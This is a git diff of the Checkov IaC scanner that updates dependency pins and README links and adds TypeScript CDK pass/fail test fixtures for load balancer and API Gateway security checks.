             "markers": "python_version >= '3.7' and python_version < '4.0'",
-            "version": "==0.20.3"
+            "version": "==0.21.0"
         },
         "types-cachetools": {
             "hashes": [
@@ -2952,12 +2943,12 @@
         },
         "types-colorama": {
             "hashes": [
-                "sha256:3ab26dcd76d2f13b1b795ed5c87a1a1a29331ea64cf614bb6ae958a3cebc3a53",
-                "sha256:7ae4f58d407d387f4f98b24d81e1b7657ec754ea1dc4619ae5bd27f0c367637e"
+                "sha256:6391de60ddc0db3f147e31ecb230006a6823e81e380862ffca1e4695c13a0b8e",
+                "sha256:a28e7f98d17d2b14fb9565d32388e419f4108f557a7d939a66319969b2b99c7a"
             ],
             "index": "pypi",
             "markers": "python_version >= '3.8'",
-            "version": "==0.4.15.20240205"
+            "version": "==0.4.15.20240311"
         },
         "types-jmespath": {
             "hashes": [
@@ -2970,37 +2961,38 @@
         },
         "types-jsonschema": {
             "hashes": [
-                "sha256:31aae1b5adc0176c1155c2d4f58348b22d92ae64315e9cc83bd6902168839232",
-                "sha256:77a4ac36b0be4f24274d5b9bf0b66208ee771c05f80e34c4641de7d63e8a872d"
+                "sha256:89996b9bd1928f820a0e252b2844be21cd2e55d062b6fa1048d88453006ad89e",
+                "sha256:f82ab9fe756e3a2642ea9712c46b403ce61eb380b939b696cff3252af42f65b0"
             ],
             "index": "pypi",
             "markers": "python_version >= '3.8'",
-            "version": "==4.21.0.20240118"
+            "version": "==4.22.0.20240610"
         },
         "types-pyyaml": {
             "hashes": [
-                "sha256:334373d392fde0fdf95af5c3f1661885fa10c52167b14593eb856289e1855062",
-                "sha256:c05bc6c158facb0676674b7f11fe3960db4f389718e19e62bd2b84d6205cfd24"
+                "sha256:a9e0f0f88dc835739b0c1ca51ee90d04ca2a897a71af79de9aec5f38cb0a5342",
+                "sha256:b845b06a1c7e54b8e5b4c683043de0d9caf205e7434b3edc678ff2411979b8f6"
             ],
             "index": "pypi",
-            "version": "==6.0.12.12"
+            "markers": "python_version >= '3.8'",
+            "version": "==6.0.12.20240311"
         },
         "types-requests": {
             "hashes": [
-                "sha256:03a28ce1d7cd54199148e043b2079cdded22d6795d19a2c2a6791a4b2b5e2eb5",
-                "sha256:9592a9a4cb92d6d75d9b491a41477272b710e021011a2a3061157e2fb1f1a5d1"
+                "sha256:97bac6b54b5bd4cf91d407e62f0932a74821bc2211f22116d9ee1dd643826caf",
+                "sha256:ed5e8a412fcc39159d6319385c009d642845f250c63902718f605cd90faade31"
             ],
             "index": "pypi",
             "markers": "python_version >= '3.8'",
-            "version": "==2.31.0.20240125"
+            "version": "==2.32.0.20240622"
         },
         "types-s3transfer": {
             "hashes": [
-                "sha256:35e4998c25df7f8985ad69dedc8e4860e8af3b43b7615e940d53c00d413bdc69",
-                "sha256:44fcdf0097b924a9aab1ee4baa1179081a9559ca62a88c807e2b256893ce688f"
+                "sha256:02154cce46528287ad76ad1a0153840e0492239a0887e8833466eccf84b98da0",
+                "sha256:49a7c81fa609ac1532f8de3756e64b58afcecad8767933310228002ec7adff74"
             ],
-            "markers": "python_version >= '3.7' and python_version < '4.0'",
-            "version": "==0.10.0"
+            "markers": "python_version >= '3.8' and python_version < '4.0'",
+            "version": "==0.10.1"
         },
         "types-tabulate": {
             "hashes": [
@@ -3013,12 +3005,12 @@
         },
         "types-tqdm": {
             "hashes": [
-                "sha256:7459b0f441b969735685645a5d8480f7912b10d05ab45f99a2db8a8e45cb550b",
-                "sha256:7acf4aade5bad3ded76eb829783f9961b1c2187948eaa6dd1ae8644dff95a938"
+                "sha256:16dce9ef522ea8d40e4f5b8d84dd8a1166eefc13ceee7a7e158bf0f1a1421a31",
+                "sha256:248aef1f9986b7b8c2c12b3cb4399fc17dba0a29e7e3f3f9cd704babb879383d"
             ],
             "index": "pypi",
             "markers": "python_version >= '3.8'",
-            "version": "==4.66.0.20240106"
+            "version": "==4.66.0.20240417"
         },
         "types-urllib3": {
             "hashes": [
@@ -3030,20 +3022,21 @@
         },
         "typing-extensions": {
             "hashes": [
-                "sha256:23478f88c37f27d76ac8aee6c905017a143b0b1b886c3c9f66bc2fd94f9f5783",
-                "sha256:af72aea155e91adfc61c3ae9e0e342dbc0cba726d6cba4b6c72c1f34e47291cd"
+                "sha256:04e5ca0351e0f3f85c6853954072df659d0d13fac324d0072316b67d7794700d",
+                "sha256:1a7ead55c7e559dd4dee8856e3a88b41225abfe1ce8df57b7c13915fe121ffb8"
             ],
             "index": "pypi",
             "markers": "python_version >= '3.8'",
-            "version": "==4.9.0"
+            "version": "==4.12.2"
         },
         "urllib3": {
             "hashes": [
-                "sha256:34b97092d7e0a3a8cf7cd10e386f401b3737364026c45e622aa02903dffe0f07",
-                "sha256:f8ecc1bba5667413457c529ab955bf8c67b45db799d159066261719e328580a0"
+                "sha256:37a0344459b199fce0e80b0d3569837ec6b6937435c5244e7fd73fa6006830f3",
+                "sha256:3e3d753a8618b86d7de333b4223005f68720bcd6a7d2bcb9fbd2229ec7c1e429"
             ],
-            "markers": "python_version < '3.10'",
-            "version": "==1.26.18"
+            "index": "pypi",
+            "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4, 3.5'",
+            "version": "==1.26.19"
         },
         "urllib3-mock": {
             "hashes": [
@@ -3055,11 +3048,11 @@
         },
         "virtualenv": {
             "hashes": [
-                "sha256:4238949c5ffe6876362d9c0180fc6c3a824a7b12b80604eeb8085f2ed7460de3",
-                "sha256:bf51c0d9c7dd63ea8e44086fa1e4fb1093a31e963b86959257378aef020e1f1b"
+                "sha256:4c43a2a236279d9ea36a0d76f98d84bd6ca94ac4e0f4a3b9d46d05e10fea542a",
+                "sha256:8cc4a31139e796e9a7de2cd5cf2489de1217193116a8fd42328f1bd65f434589"
             ],
             "markers": "python_version >= '3.7'",
-            "version": "==20.25.0"
+            "version": "==20.26.3"
         },
         "yarl": {
             "hashes": [
@@ -3160,11 +3153,11 @@
         },
         "zipp": {
             "hashes": [
-                "sha256:0e923e726174922dce09c53c59ad483ff7bbb8e572e00c7f7c46b88556409f31",
-                "sha256:84e64a1c28cf7e91ed2078bb8cc8c259cb19b76942096c8d7b84947690cabaf0"
+                "sha256:bf1dcf6450f873a13e952a29504887c89e6de7506209e5b1bcc3460135d4de19",
+                "sha256:f091755f667055f2d02b32c53771a7a6c8b47e1fdbc4b72a8b9072b3eef8015c"
             ],
             "markers": "python_version >= '3.8'",
-            "version": "==3.17.0"
+            "version": "==3.19.2"
         }
     }
 }
diff --git a/README.md b/README.md
index 50c0a4c9401..0832d28e78b 100644
--- a/README.md
+++ b/README.md
@@ -15,7 +15,7 @@
 
 **Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages.
 
-It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](docs/7.Scan%20Examples/Helm.md), [Kustomize](docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](docs/7.Scan%20Examples/Dockerfile.md),  [Serverless](docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](docs/7.Scan%20Examples/Bicep.md), [OpenAPI](docs/7.Scan%20Examples/OpenAPI.md) or [ARM Templates](docs/7.Scan%20Examples/Azure%20ARM%20templates.md) and detects security and compliance misconfigurations using graph-based scanning.
+It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md),  [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md) or [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md) and detects security and compliance misconfigurations using graph-based scanning.
 
 It performs [Software Composition Analysis (SCA) scanning](docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs).
  
@@ -37,21 +37,21 @@ Checkov also powers [**Prisma Cloud Application Security**](https://www.prismacl
 - [Getting Started](#getting-started)
 - [Disclaimer](#disclaimer)
 - [Support](#support)
-- [Migration - v2 to v3](docs/1.Welcome/Migration.md)
+- [Migration - v2 to v3](https://github.com/bridgecrewio/checkov/blob/main/docs/1.Welcome/Migration.md)
 
  ## Features
 
- * [Over 1000 built-in policies](docs/5.Policy%20Index/all.md) cover security and compliance best practices for AWS, Azure and Google Cloud.
+ * [Over 1000 built-in policies](https://github.com/bridgecrewio/checkov/blob/main/docs/5.Policy%20Index/all.md) cover security and compliance best practices for AWS, Azure and Google Cloud.
  * Scans Terraform, Terraform Plan, Terraform JSON, CloudFormation, AWS SAM, Kubernetes, Helm, Kustomize, Dockerfile, Serverless framework, Ansible, Bicep and ARM template files.
  * Scans Argo Workflows, Azure Pipelines, BitBucket Pipelines, Circle CI Pipelines, GitHub Actions and GitLab CI workflow files
  * Supports Context-awareness policies based on in-memory graph-based scanning.
  * Supports Python format for attribute policies and YAML format for both attribute and composite policies.
- * Detects [AWS credentials](docs/2.Basics/Scanning%20Credentials%20and%20Secrets.md) in EC2 Userdata, Lambda environment variables and Terraform providers.
+ * Detects [AWS credentials](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Scanning%20Credentials%20and%20Secrets.md) in EC2 Userdata, Lambda environment variables and Terraform providers.
  * [Identifies secrets](https://www.prismacloud.io/prisma/cloud/secrets-security) using regular expressions, keywords, and entropy based detection.
  * Evaluates [Terraform Provider](https://registry.terraform.io/browse/providers) settings to regulate the creation, management, and updates of IaaS, PaaS or SaaS managed through Terraform.
- * Policies support evaluation of [variables](docs/2.Basics/Handling%20Variables.md) to their optional default value.
- * Supports in-line [suppression](docs/2.Basics/Suppressing%20and%20Skipping%20Policies.md) of accepted risks or false-positives to reduce recurring scan failures. Also supports global skip from using CLI.
- * [Output](docs/2.Basics/Reviewing%20Scan%20Results.md) currently available as CLI, [CycloneDX](https://cyclonedx.org), JSON, JUnit XML, CSV, SARIF and github markdown and link to remediation [guides](https://docs.prismacloud.io/en/enterprise-edition/policy-reference/).
+ * Policies support evaluation of [variables](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Handling%20Variables.md) to their optional default value.
+ * Supports in-line [suppression](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Suppressing%20and%20Skipping%20Policies.md) of accepted risks or false-positives to reduce recurring scan failures. Also supports global skip from using CLI.
+ * [Output](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Reviewing%20Scan%20Results.md) currently available as CLI, [CycloneDX](https://cyclonedx.org), JSON, JUnit XML, CSV, SARIF and github markdown and link to remediation [guides](https://docs.prismacloud.io/en/enterprise-edition/policy-reference/).
  
 ## Screenshots
 
@@ -66,7 +66,7 @@ Scheduled scan result in Jenkins
 ## Getting started
 
 ### Requirements
- * Python >= 3.7 (Data classes are available for Python 3.7+)
+ * Python >= 3.8 (Data classes are available for Python 3.8+)
  * Terraform >= 0.12
 
 ### Installation
@@ -172,7 +172,7 @@ Check: "Ensure all data stored in the S3 bucket is securely encrypted at rest"
 	 Failed for resource: aws_s3_bucket.sls_deployment_bucket_name
 ```
 
-Start using Checkov by reading the [Getting Started](docs/1.Welcome/Quick%20Start.md) page.
+Start using Checkov by reading the [Getting Started](https://github.com/bridgecrewio/checkov/blob/main/docs/1.Welcome/Quick%20Start.md) page.
 
 ### Using Docker
 
@@ -251,14 +251,14 @@ checkov -d . --skip-check kube-system
 
 Run a scan of a container image. First pull or build the image then refer to it by the hash, ID, or name:tag:
 ```sh
-checkov --framework sca_image --docker-image sha256:1234example --dockerfile-path /Users/path/to/Dockerfile --bc-api-key ...
+checkov --framework sca_image --docker-image sha256:1234example --dockerfile-path /Users/path/to/Dockerfile --repo-id ... --bc-api-key ...
 
-checkov --docker-image <image-name>:tag --dockerfile-path /User/path/to/Dockerfile --bc-api-key ...
+checkov --docker-image <image-name>:tag --dockerfile-path /User/path/to/Dockerfile --repo-id ... --bc-api-key ...
 ```
 
 You can use --image flag also to scan container image instead of --docker-image for shortener:
 ```sh
-checkov --image <image-name>:tag --dockerfile-path /User/path/to/Dockerfile --bc-api-key ...
+checkov --image <image-name>:tag --dockerfile-path /User/path/to/Dockerfile --repo-id ... --bc-api-key ...
 ```
 
 Run an SCA scan of packages in a repo:
@@ -278,12 +278,12 @@ checkov -d .
 
 Run secrets scanning on all files in MyDirectory. Skip CKV_SECRET_6 check on json files that their suffix is DontScan
 ```sh
-checkov -d /MyDirectory --framework secrets --bc-api-key ... --skip-check CKV_SECRET_6:.*DontScan.json$
+checkov -d /MyDirectory --framework secrets --repo-id ... --bc-api-key ... --skip-check CKV_SECRET_6:.*DontScan.json$
 ```
 
 Run secrets scanning on all files in MyDirectory. Skip CKV_SECRET_6 check on json files that contains "skip_test" in path
 ```sh
-checkov -d /MyDirectory --framework secrets --bc-api-key ... --skip-check CKV_SECRET_6:.*skip_test.*json$
+checkov -d /MyDirectory --framework secrets --repo-id ... --bc-api-key ... --skip-check CKV_SECRET_6:.*skip_test.*json$
 ```
 
 One can mask values from scanning results by supplying a configuration file (using --config-file flag) with mask entry.
@@ -462,13 +462,13 @@ Defaults:
 
 Contribution is welcomed!
 
-Start by reviewing the [contribution guidelines](CONTRIBUTING.md). After that, take a look at a [good first issue](https://github.com/bridgecrewio/checkov/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22).
+Start by reviewing the [contribution guidelines](https://github.com/bridgecrewio/checkov/blob/main/CONTRIBUTING.md). After that, take a look at a [good first issue](https://github.com/bridgecrewio/checkov/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22).
 
 You can even start this with one-click dev in your browser through Gitpod at the following link:
 
 [![Open in Gitpod](https://gitpod.io/button/open-in-gitpod.svg)](https://gitpod.io/#https://github.com/bridgecrewio/checkov)
 
-Looking to contribute new checks? Learn how to write a new check (AKA policy) [here](docs/6.Contribution/Contribution%20Overview.md).
+Looking to contribute new checks? Learn how to write a new check (AKA policy) [here](https://github.com/bridgecrewio/checkov/blob/main/docs/6.Contribution/Contribution%20Overview.md).
 
 ## Disclaimer
 `checkov` does not save, publish or share with anyone any identifiable customer information.  
@@ -483,4 +483,4 @@ To skip this API call use the flag `--skip-download`.
 Start with our [Documentation](https://www.checkov.io/1.Welcome/Quick%20Start.html) for quick tutorials and examples.
 
 ## Python Version Support
-We follow the official support cycle of Python, and we use automated tests for all supported versions of Python. This means we currently support Python 3.7 - 3.11, inclusive. Note that Python 3.7 is reaching EOL on June 2023. After that time, we will have a short grace period where we will continue 3.7 support until September 2023, and then it will no longer be considered supported for Checkov. If you run into any issues with any non-EOL Python version, please open an Issue.
+We follow the official support cycle of Python, and we use automated tests for all supported versions of Python. This means we currently support Python 3.8 - 3.11, inclusive. Note that Python 3.7 reached EOL on June 2023 and Python 3.8 will reach EOL in October 2024. If you run into any issues with any non-EOL Python version, please open an Issue.
diff --git a/cdk_integration_tests/prepare_data.sh b/cdk_integration_tests/prepare_data.sh
index 45417830a62..8d3934facf1 100755
--- a/cdk_integration_tests/prepare_data.sh
+++ b/cdk_integration_tests/prepare_data.sh
@@ -19,9 +19,8 @@
 #  fi
 #done
 
-
-echo "creating report for CDK python"
+echo "creating report for CDK"
 pipenv run checkov -s --framework cdk --repo-id cli/cdk -o json \
-        -d "cdk_integration_tests/src/python" > "checkov_report_cdk_python.json"
+        -d "cdk_integration_tests/src" > "checkov_report_cdk.json"
 
 #todo: iterate over all the cdk typescript checks - when ts supported in sast
diff --git a/cdk_integration_tests/run_integration_tests.sh b/cdk_integration_tests/run_integration_tests.sh
index 832bb498156..24d4858dfc8 100755
--- a/cdk_integration_tests/run_integration_tests.sh
+++ b/cdk_integration_tests/run_integration_tests.sh
@@ -18,9 +18,9 @@ set_env_vars() {
 }
 
 prepare_data () {
-  echo "creating report for CDK python"
+  echo "creating report for CDK"
   python checkov/main.py -s --framework cdk --repo-id prisma/cdk -o json \
-    -d "cdk_integration_tests/src/python" > "checkov_report_cdk_python.json"
+    -d "cdk_integration_tests/src" > "checkov_report_cdk.json"
 
 }
 
@@ -30,8 +30,8 @@ delete_reports () {
   rm checkov_checks_list.txt
 }
 
-echo "calling set_env_vars"
-set_env_vars
+#echo "calling set_env_vars"
+#set_env_vars
 
 if [[ -z "BC_API_KEY" ]]; then
    echo "BC_API_KEY is missing."
diff --git a/cdk_integration_tests/src/typescript/ALBDropHttpHeaders/fail.ts b/cdk_integration_tests/src/typescript/ALBDropHttpHeaders/fail.ts
new file mode 100644
index 00000000000..a56c4784d2e
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ALBDropHttpHeaders/fail.ts
@@ -0,0 +1,17 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class ALBDropHttpHeadersStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnLoadBalancer(this, { type: 'not_application', loadBalancerAttributes: [{'key': 'routing.http.drop_invalid_header_fields.enabled', 'value': 'true'}] })
+        new elbv2.CfnLoadBalancer(this, { type: 'application', loadBalancerAttributes: [{'value': 'false', 'key': 'routing.http.drop_invalid_header_fields.enabled'}] })
+        new elbv2.CfnLoadBalancer(this, { loadBalancerAttributes: [{'key': 'routing.http.drop_invalid_header_fields.disable', 'value': 'true'}], type: 'application' })
+        new elbv2.CfnLoadBalancer(this, { loadBalancerAttributes: [], type: 'application' })
+    }
+}
+
+const app = new App();
+new ALBDropHttpHeadersStack(app, 'ALBDropHttpHeadersStack');
diff --git a/cdk_integration_tests/src/typescript/ALBDropHttpHeaders/pass.ts b/cdk_integration_tests/src/typescript/ALBDropHttpHeaders/pass.ts
new file mode 100644
index 00000000000..c337d29d196
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ALBDropHttpHeaders/pass.ts
@@ -0,0 +1,17 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class ALBDropHttpHeadersStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnLoadBalancer(this, { type: 'application', loadBalancerAttributes: [{'key': 'routing.http.drop_invalid_header_fields.enabled', 'value': 'true'}] })
+        new elbv2.CfnLoadBalancer(this, { type: 'application', loadBalancerAttributes: [{'value': 'true', 'key': 'routing.http.drop_invalid_header_fields.enabled'}] })
+        new elbv2.CfnLoadBalancer(this, { loadBalancerAttributes: [{'key': 'routing.http.drop_invalid_header_fields.enabled', 'value': 'true'}], type: 'application' })
+        new elbv2.CfnLoadBalancer(this, { loadBalancerAttributes: [{'value': 'true', 'key': 'routing.http.drop_invalid_header_fields.enabled'}], type: 'application' })
+    }
+}
+
+const app = new App();
+new ALBDropHttpHeadersStack(app, 'ALBDropHttpHeadersStack');
diff --git a/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts
new file mode 100644
index 00000000000..7d297878ad3
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class ALBListenerHTTPSStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnListener(this, {})
+    }
+}
+
+const app = new App();
+new ALBListenerHTTPSStack(app, 'ALBListenerHTTPSStack');
diff --git a/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts
new file mode 100644
index 00000000000..ce4c92e42e2
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts
@@ -0,0 +1,19 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class ALBListenerHTTPSStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnListener(this, {protocol: 'HTTPS'})
+        new elbv2.CfnListener(this, {protocol: 'TLS'})
+        new elbv2.CfnListener(this, {protocol: 'TCP'})
+        new elbv2.CfnListener(this, {protocol: 'UDP'})
+        new elbv2.CfnListener(this, {protocol: 'TCP_UDP'})
+        new elbv2.CfnListener(this, {defaultActions: [{type: 'redirect', redirectConfig:{protocol: 'HTTPS'}}]})
+    }
+}
+
+const app = new App();
+new ALBListenerHTTPSStack(app, 'ALBListenerHTTPSStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayAccessLogging/fail.ts b/cdk_integration_tests/src/typescript/APIGatewayAccessLogging/fail.ts
new file mode 100644
index 00000000000..8087b05b326
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayAccessLogging/fail.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { apigateway as api } from 'aws-cdk-lib';
+
+class APIGatewayAccessLoggingStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new api.CfnStage(this, {})
+    }
+}
+
+const app = new App();
+new APIGatewayAccessLoggingStack(app, 'APIGatewayAccessLoggingStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayAccessLogging/pass.ts b/cdk_integration_tests/src/typescript/APIGatewayAccessLogging/pass.ts
new file mode 100644
index 00000000000..d62d584e4f0
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayAccessLogging/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { apigateway as api } from 'aws-cdk-lib';
+
+class APIGatewayAccessLoggingStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new api.CfnStage(this, { accessLogSetting: { destinationArn: "1" }} )
+    }
+}
+
+const app = new App();
+new APIGatewayAccessLoggingStack(app, 'APIGatewayAccessLoggingStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayAuthorization/fail.ts b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/fail.ts
new file mode 100644
index 00000000000..2a1d6f28fa5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/fail.ts
@@ -0,0 +1,14 @@
+// Import necessary AWS CDK packages
+import * as apigateway from '@aws-cdk/aws-apigateway';
+import { Resource } from '@aws-cdk/core';
+
+// Example resource and method declarations
+const resource: Resource = new Resource(); // Placeholder for actual resource initialization
+
+// Test cases for the policy patterns
+
+// This should match the first pattern and not be sanitized by the second pattern
+// SOURCE
+const method1 = resource.addMethod('GET', new apigateway.MockIntegration(), {
+  apiKeyRequired: false
+});
diff --git a/cdk_integration_tests/src/typescript/APIGatewayAuthorization/fail__2__.ts b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/fail__2__.ts
new file mode 100644
index 00000000000..0e9e1e4dc93
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/fail__2__.ts
@@ -0,0 +1,14 @@
+// Import necessary AWS CDK packages
+import * as apigateway from '@aws-cdk/aws-apigateway';
+import { Resource } from '@aws-cdk/core';
+
+// Example resource and method declarations
+const resource: Resource = new Resource(); // Placeholder for actual resource initialization
+
+// Test cases for the policy patterns
+
+// This should match the second pattern
+// SINK
+const method2 = resource.addMethod('POST', new apigateway.MockIntegration(), {
+  authorizationType: apigateway.AuthorizationType.NONE
+});
diff --git a/cdk_integration_tests/src/typescript/APIGatewayAuthorization/pass.ts b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/pass.ts
new file mode 100644
index 00000000000..13c17e21457
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/pass.ts
@@ -0,0 +1,15 @@
+// Import necessary AWS CDK packages
+import * as apigateway from '@aws-cdk/aws-apigateway';
+import { Resource } from '@aws-cdk/core';
+
+// Example resource and method declarations
+const resource: Resource = new Resource(); // Placeholder for actual resource initialization
+
+// Test cases for the policy patterns
+
+// This should not match any pattern as it includes an authorization type
+// SANITIZER
+const method3 = resource.addMethod('PUT', new apigateway.MockIntegration(), {
+  authorizationType: apigateway.AuthorizationType.COGNITO,
+  apiKeyRequired: true
+});
diff --git a/cdk_integration_tests/src/typescript/APIGatewayAuthorization/pass__2__.ts b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/pass__2__.ts
new file mode 100644
index 00000000000..a5ad8ffb022
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/pass__2__.ts
@@ -0,0 +1,13 @@
+// Import necessary AWS CDK packages
+import * as apigateway from '@aws-cdk/aws-apigateway';
+import { Resource } from '@aws-cdk/core';
+
+// Example resource and method declarations
+const resource: Resource = new Resource(); // Placeholder for actual resource initialization
+
+// Test cases for the policy patterns
+
+// This should not match any pattern as it includes an authorization type and is not open
+const method4 = resource.addMethod('DELETE', new apigateway.MockIntegration(), {
+  authorizationType: apigateway.AuthorizationType.IAM
+});
diff --git a/cdk_integration_tests/src/typescript/APIGatewayCacheEnable/fail.ts b/cdk_integration_tests/src/typescript/APIGatewayCacheEnable/fail.ts
new file mode 100644
index 00000000000..117192f083a
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayCacheEnable/fail.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class APIGatewayCacheEnableStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.Stage(this, {})
+    }
+}
+
+const app = new App();
+new APIGatewayCacheEnableStack(app, 'APIGatewayCacheEnableStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayCacheEnable/pass.ts b/cdk_integration_tests/src/typescript/APIGatewayCacheEnable/pass.ts
new file mode 100644
index 00000000000..af0eb47bb6d
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayCacheEnable/pass.ts
@@ -0,0 +1,13 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class APIGatewayCacheEnableStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+        new elbv2.Stage(this, { cacheClusterEnabled: true} )
+    }
+}
+
+const app = new App();
+new APIGatewayCacheEnableStack(app, 'APIGatewayCacheEnableStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayV2AccessLogging/fail.ts b/cdk_integration_tests/src/typescript/APIGatewayV2AccessLogging/fail.ts
new file mode 100644
index 00000000000..20676ea815b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayV2AccessLogging/fail.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class APIGatewayV2AccessLoggingStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnApi(this, {})
+    }
+}
+
+const app = new App();
+new APIGatewayV2AccessLoggingStack(app, 'APIGatewayV2AccessLoggingStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayV2AccessLogging/pass.ts b/cdk_integration_tests/src/typescript/APIGatewayV2AccessLogging/pass.ts
new file mode 100644
index 00000000000..156ea89ee4b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayV2AccessLogging/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class APIGatewayV2AccessLoggingStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnApi(this, {accessLogSettings: {destinationArn: "1"}})
+    }
+}
+
+const app = new App();
+new APIGatewayV2AccessLoggingStack(app, 'APIGatewayV2AccessLoggingStack');
